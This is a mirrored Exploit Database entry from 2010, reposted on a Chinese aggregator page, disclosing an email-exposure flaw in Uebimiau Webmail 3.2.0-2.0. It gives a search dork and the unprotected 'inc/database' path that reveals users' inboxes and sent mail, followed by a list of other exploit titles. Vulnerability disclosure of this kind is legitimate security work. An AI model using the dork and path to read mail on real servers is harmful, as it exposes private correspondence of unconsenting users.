Uebimiau Webmail 3.2.0-2.0 – Email Disclosure

Exploit Database
17 阅读

作者： Z3r0c0re, R4vax

日期： 2010-03-09
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11666/

# Exploit Title: Uebimiau Webmail v3.2.0-2.0 | Email Disclosure
# Date: 09 March 2010
# Author: Z3r0c0re, R4vax
# Software Link: http://www.uebimiau.org/download.php
# Version: 3.2.0-2.0
# Tested on: php
# Code :
*********************************************************
* Uebimiau Webmail Email Disclosure *
*********************************************************
* D0rk:	 *
* "Uebimiau Webmail v3.2.0-2.0"	 *
*********************************************************
* Vuln:	 *
* http://[host]/[path]/inc/database	 *
*********************************************************
* Desc:	 *
* accessing these directores lets you view the users- *
* inboxes and sent emails and any other folders the- *
* user may have.	 *
*********************************************************

last Exploits
Uebimiau Webmail 3.2.0-2.0 – Email Disclosure的更多信息

Social Share – ‘vote.php’ HTTP Response Splitting：
ZKTeco ZKBioSecurity 3.0 – ‘visLogin.jsp’ Local Authentication Bypass：
IBM RICOH InfoPrint 6500 Printer – HTML Injection：
Silurus Classifieds Script 2.0 – ‘wcategory’ SQL Injection：
BloofoxCMS – ‘index.php’ Arbitrary File Upload：
ZenPhoto 1.4.11 – Remote File Inclusion：
Viennabux Beta! – ‘cat’ SQL Injection：
Mambo 4.6.x < 4.6.5 - SQL Injection：